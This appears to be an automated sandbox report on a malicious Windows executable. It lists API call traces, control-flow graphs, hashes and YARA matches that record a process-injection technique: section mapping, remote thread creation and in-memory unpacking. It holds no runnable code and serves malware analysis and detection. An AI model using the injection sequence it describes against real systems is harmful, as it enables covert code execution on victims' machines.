                                                                                                                                              • Instruction ID: d2c64d108ecd7190b789ce3c9d4f03e3911909dfd4099b6475a4add21270c3a3
                                                                                                                                              • Opcode Fuzzy Hash: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
                                                                                                                                              • Instruction Fuzzy Hash: 6D019EB7208208E6DB006AA5AC51ABA33189B44359F304537F723790F6D57D8612E72F

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 493 4018f1-40194b call 401193 Sleep call 40141f 503 40195a-4019a5 call 401193 493->503 504 40194d-401955 call 401514 493->504 504->503
                                                                                                                                              APIs
                                                                                                                                              • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                                                                                • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                                                • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                                                • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1783452095.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_HaPJ2rPP6w.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1885482327-0
                                                                                                                                              • Opcode ID: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                                                                                                                              • Instruction ID: b5ca90d31d4069b8fd1e735589466699ca1bb5e14181e618ca72d4e2f39bbf06
                                                                                                                                              • Opcode Fuzzy Hash: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                                                                                                                              • Instruction Fuzzy Hash: D101D2B6608204EBDB019AF49C62A7A37549F44315F200137FA53790F1D67D8643E72F
                                                                                                                                              APIs
                                                                                                                                              • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                                                                                • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                                                • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                                                • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1783452095.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_HaPJ2rPP6w.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1885482327-0
                                                                                                                                              • Opcode ID: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                                                                                                                              • Instruction ID: 0621b20c29367ada74e4c9127c9a5516285bec5e68af8f441e6b7f153e3f788d
                                                                                                                                              • Opcode Fuzzy Hash: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                                                                                                                              • Instruction Fuzzy Hash: 11017CB560C204EAEB109AA49C61A7A3318AB44354F304537FA27790F5D67D9612E72F
                                                                                                                                              APIs
                                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00851213
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1783948879.000000000084E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0084E000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_84e000_HaPJ2rPP6w.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4275171209-0
                                                                                                                                              • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                              • Instruction ID: aeca5b9af20098b71272df208fbef36ba55aaaae5bba9500b4d1fc4f960441fc
                                                                                                                                              • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                              • Instruction Fuzzy Hash: AE112B79A00208EFDB01DF98C989E98BBF5EF08351F058094F9489B362D771EA50DB80
                                                                                                                                              APIs
                                                                                                                                              • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                                                                                • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                                                • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                                                • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1783452095.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_HaPJ2rPP6w.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1885482327-0
                                                                                                                                              • Opcode ID: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                                                                                                                              • Instruction ID: ea6e3854d66af35421fcd7571e0742f45a6e64d38424a4e1b6315f5079e28d0a
                                                                                                                                              • Opcode Fuzzy Hash: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                                                                                                                              • Instruction Fuzzy Hash: 28F08CB6208204EADB00AEA49C61EBA3318AB44314F304533FB23790F5C67D8612E72F
                                                                                                                                              APIs
                                                                                                                                              • LocalAlloc.KERNELBASE(00000000,00511CE4,00416AC7), ref: 004164A8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1783476903.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_40b000_HaPJ2rPP6w.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AllocLocal
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3494564517-0
                                                                                                                                              • Opcode ID: f108658839a774f3ec8041a38e7b5c842f30d111f5bdb726fd1b9c974fc00c67
                                                                                                                                              • Instruction ID: 0e1443596e4cadc07de741eab66e71947b5663c851de1fa4f156f6081f94fab8
                                                                                                                                              • Opcode Fuzzy Hash: f108658839a774f3ec8041a38e7b5c842f30d111f5bdb726fd1b9c974fc00c67
                                                                                                                                              • Instruction Fuzzy Hash: 95B092B41896009BD2008BB0AD04BD03AA4A318302F008191F700C51A0DA201808AF1C
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1783719870.00000000006B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6b0000_HaPJ2rPP6w.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: .$GetProcAddress.$l
                                                                                                                                              • API String ID: 0-2784972518
                                                                                                                                              • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                              • Instruction ID: 254654e92616fbed97a9e78bff470e723ef2f09cb09b4f77d6b80293d0aaa023
                                                                                                                                              • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                              • Instruction Fuzzy Hash: 29316CB6900609DFEB10CF99C880AEEBBF6FF48324F24514AD441A7351D771EA85CBA4
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1783948879.000000000084E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0084E000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_84e000_HaPJ2rPP6w.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                              • Instruction ID: e6cd66ab24a90b427e710bfac6420b71905d8a9ee3df92486e1744edcc1a43f8
                                                                                                                                              • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                              • Instruction Fuzzy Hash: 3F11AC72340100AFDB44CE59DC92EA273EAFB88320B2984A5ED08CB306D675EC01CB60
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1783452095.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_HaPJ2rPP6w.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: d637f55854845c17b2ef1889abfa65daee778aef84c81fe99ca145d77efb4ab1
                                                                                                                                              • Instruction ID: 8df8bbe6331efc2743c071309605838865bd09ee4bc9229f5037613db63a7100
                                                                                                                                              • Opcode Fuzzy Hash: d637f55854845c17b2ef1889abfa65daee778aef84c81fe99ca145d77efb4ab1
                                                                                                                                              • Instruction Fuzzy Hash: 3CF0F0A1E2E243AFCA0A1E34A916532AF1C751632372401FFA083752C2E23D0B17619F
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1783719870.00000000006B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6b0000_HaPJ2rPP6w.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                                              • Instruction ID: 234ba53533d4c3da5cb596b1fc6310159d7d1ff50711d85f8090656b9c3ca7e8
                                                                                                                                              • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                                              • Instruction Fuzzy Hash: 0D01A7B66006048FEF21CF64C805BEB37E6FF85315F4545E5D50697381E774A9818B90
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1783452095.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_HaPJ2rPP6w.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 2e697f2bdb2541e438c090e00759e651186a60c26cca26bbac42aeca89057f02
                                                                                                                                              • Instruction ID: 9241026e722b7dd7cbe781a55eac82938fa1721c21c2f19ebd5655df2a8ce19b
                                                                                                                                              • Opcode Fuzzy Hash: 2e697f2bdb2541e438c090e00759e651186a60c26cca26bbac42aeca89057f02
                                                                                                                                              • Instruction Fuzzy Hash: 90F024A191E281DBCA0E1E2858169327F1C7A5230733405FF9093762C2E13D8B02619F
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1783452095.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_HaPJ2rPP6w.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: ffb84ad0bafd287640d5e2703f1f7dee9546aae40f50b635da61e00f6775f880
                                                                                                                                              • Instruction ID: 0b233a05c36d383cd3dc693d5d52553799fa9f094e89171df70cdd77f1a33a14
                                                                                                                                              • Opcode Fuzzy Hash: ffb84ad0bafd287640d5e2703f1f7dee9546aae40f50b635da61e00f6775f880
                                                                                                                                              • Instruction Fuzzy Hash: 5CF027A1E6E202ABCA0E1E20AD165727F4D651132372401FFA053B63C1E17D4B07619F
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1783452095.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_HaPJ2rPP6w.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 675dd5adc9fa045870a710e44379b64774d26f731239f7a86ac84ccf831d603a
                                                                                                                                              • Instruction ID: 61f4eeca6a5bdba97633f9ce55ed0ebe4cfc5c7823726c26b0d716f95b27c2a1
                                                                                                                                              • Opcode Fuzzy Hash: 675dd5adc9fa045870a710e44379b64774d26f731239f7a86ac84ccf831d603a
                                                                                                                                              • Instruction Fuzzy Hash: 1EF027A191E242DBCA0D2E246D158322F4C295530733401FF9053B92C2E03E8B07619F
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1783452095.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_HaPJ2rPP6w.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 7491e8d205a9a81a512842342f84d5d05ba67224b994174453f1348fb0568999
                                                                                                                                              • Instruction ID: 50319dc6f67c7bb301174255112627998741b5b21f267b3f7f348d4aa007f6d0
                                                                                                                                              • Opcode Fuzzy Hash: 7491e8d205a9a81a512842342f84d5d05ba67224b994174453f1348fb0568999
                                                                                                                                              • Instruction Fuzzy Hash: A5E068A2D2E2029BCA1E1E206D464333F4C625630B72001FF9053B92C1F03E4B0661DF
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1783452095.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_HaPJ2rPP6w.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 4880d3875d1ad92a9fbe5811d46a77b3d6ce579c17d5e0502d0cbfecac410ff8
                                                                                                                                              • Instruction ID: 65af031b81eeafed772fbc50416c1b4fdc84f259fd59d49ecec168145e9dac47
                                                                                                                                              • Opcode Fuzzy Hash: 4880d3875d1ad92a9fbe5811d46a77b3d6ce579c17d5e0502d0cbfecac410ff8
                                                                                                                                              • Instruction Fuzzy Hash: 3EE0ED92E6E2854BCAA52E30980A1623F5C69A331A32480FFA002A52D2F03E0F05815B
                                                                                                                                              APIs
                                                                                                                                              • QueryDosDeviceA.KERNEL32(00000000,?,00000000), ref: 00416754
                                                                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041676F
                                                                                                                                              • HeapDestroy.KERNEL32(00000000), ref: 0041678E
                                                                                                                                              • GetNumaProcessorNode.KERNEL32(?,00000000), ref: 0041679D
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1783476903.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_40b000_HaPJ2rPP6w.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DestroyDeviceEnvironmentFreeHeapNodeNumaProcessorQueryStrings
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4159173863-0
                                                                                                                                              • Opcode ID: b64c93f38c0632519a7331ea2ffcdac579a561a96d48f66aef6059a363055a99
                                                                                                                                              • Instruction ID: bfda60e46cdd917eef3824eff81274299ff88806db2d43078e848f831fad2497
                                                                                                                                              • Opcode Fuzzy Hash: b64c93f38c0632519a7331ea2ffcdac579a561a96d48f66aef6059a363055a99
                                                                                                                                              • Instruction Fuzzy Hash: B301B1716852049BD710EBA4ED45BDA7B78A70C31AF0040A6F709D62D0DA3499888B6E

                                                                                                                                              Execution Graph

                                                                                                                                              Execution Coverage:9.5%
                                                                                                                                              Dynamic/Decrypted Code Coverage:28.2%
                                                                                                                                              Signature Coverage:0%
                                                                                                                                              Total number of Nodes:174
                                                                                                                                              Total number of Limit Nodes:6
                                                                                                                                              execution_graph 3455 402e40 3458 402e37 3455->3458 3456 402edf 3458->3456 3459 4018e6 3458->3459 3460 4018f5 3459->3460 3461 40192e Sleep 3460->3461 3462 401949 3461->3462 3464 40195a 3462->3464 3465 401514 3462->3465 3464->3456 3466 401524 3465->3466 3467 4015c4 NtDuplicateObject 3466->3467 3473 4016e0 3466->3473 3468 4015e1 NtCreateSection 3467->3468 3467->3473 3469 401661 NtCreateSection 3468->3469 3470 401607 NtMapViewOfSection 3468->3470 3472 40168d 3469->3472 3469->3473 3470->3469 3471 40162a NtMapViewOfSection 3470->3471 3471->3469 3474 401648 3471->3474 3472->3473 3475 401697 NtMapViewOfSection 3472->3475 3473->3464 3474->3469 3475->3473 3476 4016be NtMapViewOfSection 3475->3476 3476->3473 3577 630001 3578 630005 3577->3578 3583 63092b GetPEB 3578->3583 3580 630030 3585 63003c 3580->3585 3584 630972 3583->3584 3584->3580 3586 630049 3585->3586 3587 630e0f 2 API calls 3586->3587 3588 630223 3587->3588 3589 630d90 GetPEB 3588->3589 3590 630238 VirtualAlloc 3589->3590 3591 630265 3590->3591 3592 6302ce VirtualProtect 3591->3592 3594 63030b 3592->3594 3593 630439 VirtualFree 3597 6304be LoadLibraryA 3593->3597 3594->3593 3596 6308c7 3597->3596 3645 401542 3646 40153b 3645->3646 3647 4015c4 NtDuplicateObject 3646->3647 3656 4016e0 3646->3656 3648 4015e1 NtCreateSection 3647->3648 3647->3656 3649 401661 NtCreateSection 3648->3649 3650 401607 NtMapViewOfSection 3648->3650 3652 40168d 3649->3652 3649->3656 3650->3649 3651 40162a NtMapViewOfSection 3650->3651 3651->3649 3653 401648 3651->3653 3654 401697 NtMapViewOfSection 3652->3654 3652->3656 3653->3649 3655 4016be NtMapViewOfSection 3654->3655 3654->3656 3655->3656 3532 710134 3535 710143 3532->3535 3536 710152 3535->3536 3539 7108e3 3536->3539 3540 7108fe 3539->3540 3541 710907 CreateToolhelp32Snapshot 3540->3541 3542 710923 Module32First 3540->3542 3541->3540 3541->3542 3543 710932 3542->3543 3544 710142 3542->3544 3546 7105a2 3543->3546 3547 7105cd 3546->3547 3548 710616 3547->3548 3549 7105de VirtualAlloc 3547->3549 3548->3548 3549->3548 3598 630005 3599 63092b GetPEB 3598->3599 3600 630030 3599->3600 3601 63003c 7 API calls 3600->3601 3602 630038 3601->3602 3615 416ae6 3616 416af0 LoadLibraryW 3615->3616 3625 4164d0 GetModuleHandleW GetProcAddress VirtualProtect 3616->3625 3619 416b1d 3620 416720 8 API calls 3619->3620 3621 416b22 3620->3621 3622 416b63 InterlockedDecrement 3621->3622 3623 416b43 MoveFileA 3621->3623 3624 416b79 3621->3624 3622->3621 3623->3621 3625->3619 3704 402dd0 3705 402ddc 3704->3705 3706 4018e6 8 API calls 3705->3706 3707 402edf 3705->3707 3706->3707 3477 416bf0 3480 4167c0 3477->3480 3479 416bf5 3481 4167cd 3480->3481 3482 4169df 3481->3482 3483 4168cf InterlockedCompareExchange GetFocus ReadConsoleW FindAtomW SetConsoleMode 3481->3483 3484 4169f0 SetCommState 3482->3484 3490 416a09 3482->3490 3485 416917 7 API calls 3483->3485 3484->3482 3486 4169c0 3485->3486 3487 4169b4 ObjectPrivilegeAuditAlarmA 3485->3487 3488 4169d0 3486->3488 3489 4169c9 ReleaseMutex 3486->3489 3487->3486 3488->3482 3489->3488 3491 416ac2 3490->3491 3492 416a16 8 API calls 3490->3492 3505 4164a0 LocalAlloc 3491->3505 3503 416a93 3492->3503 3496 416b1d 3507 416720 3496->3507 3497 416ac7 LoadLibraryW 3506 4164d0 GetModuleHandleW GetProcAddress VirtualProtect 3497->3506 3499 416b39 MoveFileA 3500 416b22 3499->3500 3500->3499 3501 416b63 InterlockedDecrement 3500->3501 3504 416b79 3500->3504 3501->3500 3503->3491 3504->3479 3505->3497 3506->3496 3508 416749 QueryDosDeviceA 3507->3508 3509 41675a 3507->3509 3508->3509 3518 416670 3509->3518 3512 416775 3521 4166b0 3512->3521 3513 41676d FreeEnvironmentStringsW 3513->3512 3516 4167a3 3516->3500 3517 41678c HeapDestroy GetNumaProcessorNode 3517->3516 3519 416681 FatalAppExitA GetModuleHandleW 3518->3519 3520 416693 3518->3520 3519->3520 3520->3512 3520->3513 3522 4166c3 BuildCommDCBA 3521->3522 3525 4166cf 3521->3525 3522->3525 3523 4166fb 3523->3516 3523->3517 3525->3523 3526 4166a0 3525->3526 3529 416620 3526->3529 3530 41664b 3529->3530 3531 41663c SetPriorityClass 3529->3531 3530->3525 3531->3530 3626 4018f1 3627 4018f6 3626->3627 3628 40192e Sleep 3627->3628 3629 401949 3628->3629 3630 401514 7 API calls 3629->3630 3631 40195a 3629->3631 3630->3631 3691 401915 3692 4018c6 3691->3692 3693 40191a 3691->3693 3694 40192e Sleep 3693->3694 3695 401949 3694->3695 3696 401514 7 API calls 3695->3696 3697 40195a 3695->3697 3696->3697 3611 4166d7 3613 4166e0 3611->3613 3612 4166a0 SetPriorityClass 3612->3613 3613->3612 3614 4166fb 3613->3614 3550 402f97 3551 4030ee 3550->3551 3552 402fc1 3550->3552 3552->3551 3553 40307c RtlCreateUserThread NtTerminateProcess 3552->3553 3553->3551 3681 402d7b 3683 402d38 3681->3683 3682 4018e6 8 API calls 3684 402dc7 3682->3684 3683->3681 3683->3682 3683->3684 3632 4014fe 3633 401506 3632->3633 3634 401531 3632->3634 3635 4015c4 NtDuplicateObject 3634->3635 3637 4016e0 3634->3637 3636 4015e1 NtCreateSection 3635->3636 3635->3637 3638 401661 NtCreateSection 3636->3638 3639 401607 NtMapViewOfSection 3636->3639 3638->3637 3641 40168d 3638->3641 3639->3638 3640 40162a NtMapViewOfSection 3639->3640 3640->3638 3642 401648 3640->3642 3641->3637 3643 401697 NtMapViewOfSection 3641->3643 3642->3638 3643->3637 3644 4016be NtMapViewOfSection 3643->3644 3644->3637 3554 63003c 3555 630049 3554->3555 3567 630e0f SetErrorMode SetErrorMode 3555->3567 3560 630265 3561 6302ce VirtualProtect 3560->3561 3563 63030b 3561->3563 3562 630439 VirtualFree 3566 6304be LoadLibraryA 3562->3566 3563->3562 3565 6308c7 3566->3565 3568 630223 3567->3568 3569 630d90 3568->3569 3570 630dad 3569->3570 3571 630dbb GetPEB 3570->3571 3572 630238 VirtualAlloc 3570->3572 3571->3572 3572->3560

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 0 4167c0-4167e8 2 4167f0-4167f7 0->2 3 416824-41682a 2->3 4 4167f9-416820 2->4 5 41682c-416838 3->5 6 41683e-416848 3->6 4->3 5->6 7 416883-41688a 6->7 8 41684a-416879 6->8 7->2 9 416890-416896 7->9 8->7 11 416898-41689e 9->11 12 4168a0-4168a6 11->12 13 4168ac-4168b3 11->13 12->13 14 4168b5 13->14 15 4168b9-4168c0 13->15 14->15 15->11 16 4168c2-4168c9 15->16 17 4169df-4169ed 16->17 18 4168cf-4169b2 InterlockedCompareExchange GetFocus ReadConsoleW FindAtomW SetConsoleMode GetDefaultCommConfigA CopyFileA CreatePipe GetEnvironmentStringsW ReadConsoleOutputA GetModuleFileNameA GetSystemTimeAdjustment 16->18 19 4169f0-4169fe SetCommState 17->19 21 4169c0-4169c7 18->21 22 4169b4-4169ba ObjectPrivilegeAuditAlarmA 18->22 26 416a00-416a07 19->26 27 416a09-416a10 19->27 24 4169d0-4169dc 21->24 25 4169c9-4169ca ReleaseMutex 21->25 22->21 24->17 25->24 26->19 26->27 28 416ac2-416ad1 call 4164a0 27->28 29 416a16-416abc GetConsoleAliasesLengthW GetComputerNameW GetFileAttributesA GetConsoleAliasExesLengthA GetBinaryType FormatMessageA GetLongPathNameW GetCommTimeouts 27->29 34 416ad3-416ae4 28->34 35 416b0d-416b18 LoadLibraryW call 4164d0 28->35 29->28 37 416af0-416b00 34->37 40 416b1d-416b2e call 416720 35->40 41 416b02 37->41 42 416b08-416b0b 37->42 46 416b30-416b37 40->46 41->42 42->35 42->37 48 416b39-416b47 MoveFileA 46->48 49 416b4d-416b53 46->49 48->49 50 416b55 call 4164c0 49->50 51 416b5a-416b61 49->51 50->51 55 416b70-416b77 51->55 56 416b63-416b6a InterlockedDecrement 51->56 55->46 58 416b79-416b89 55->58 56->55 59 416b90-416ba0 58->59 61 416ba2 59->61 62 416ba9-416bac 59->62 61->62 62->59 64 416bae-416bb9 62->64 65 416bc0-416bc5 64->65 66 416bc7-416bcd 65->66 67 416bcf-416bd5 65->67 66->67 68 416bd7-416be4 66->68 67->65 67->68
                                                                                                                                              APIs
                                                                                                                                              • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 004168DA
                                                                                                                                              • GetFocus.USER32 ref: 004168E0
                                                                                                                                              • ReadConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004168ED
                                                                                                                                              • FindAtomW.KERNEL32(00000000), ref: 004168F4
                                                                                                                                              • SetConsoleMode.KERNEL32(00000000,00000000), ref: 004168FC
                                                                                                                                              • GetDefaultCommConfigA.KERNEL32(00000000,?,00000000), ref: 00416923
                                                                                                                                              • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 0041692C
                                                                                                                                              • CreatePipe.KERNEL32(?,00000000,00000000,00000000), ref: 00416942
                                                                                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 00416948
                                                                                                                                              • ReadConsoleOutputA.KERNEL32(00000000,?,?,?,?), ref: 0041698D
                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 0041699C
                                                                                                                                              • GetSystemTimeAdjustment.KERNEL32(00000000,00000000,00000000), ref: 004169A5
                                                                                                                                              • ObjectPrivilegeAuditAlarmA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 004169BA
                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 004169CA
                                                                                                                                              • SetCommState.KERNELBASE(00000000,00000000), ref: 004169F4
                                                                                                                                              • GetConsoleAliasesLengthW.KERNEL32(00000000), ref: 00416A25
                                                                                                                                              • GetComputerNameW.KERNEL32(?,?), ref: 00416A39
                                                                                                                                              • GetFileAttributesA.KERNEL32(00000000), ref: 00416A40
                                                                                                                                              • GetConsoleAliasExesLengthA.KERNEL32 ref: 00416A46
                                                                                                                                              • GetBinaryType.KERNEL32(0041834C,?), ref: 00416A58
                                                                                                                                              • FormatMessageA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00416A6B
                                                                                                                                              • GetLongPathNameW.KERNEL32(00418360,?,00000000), ref: 00416A7E
                                                                                                                                              • GetCommTimeouts.KERNEL32(00000000,00000000), ref: 00416A86
                                                                                                                                              • LoadLibraryW.KERNELBASE(00418374), ref: 00416B12
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.2053825637.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_40b000_wideaec.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Console$CommFileName$LengthRead$AdjustmentAlarmAliasAliasesAtomAttributesAuditBinaryCompareComputerConfigCopyCreateDefaultEnvironmentExchangeExesFindFocusFormatInterlockedLibraryLoadLongMessageModeModuleMutexObjectOutputPathPipePrivilegeReleaseStateStringsSystemTimeTimeoutsType
                                                                                                                                              • String ID: k`$}$
                                                                                                                                              • API String ID: 4079765171-956986773
                                                                                                                                              • Opcode ID: 8a8c107c90811e6390bac5a4fc857e8bc3aa7e6139d6a18d575a9703efd087d7
                                                                                                                                              • Instruction ID: 66b7ba66da8bb5d3bd80010fb135f4a1ed8397abbfee7ed1f5eca20cf58200d5
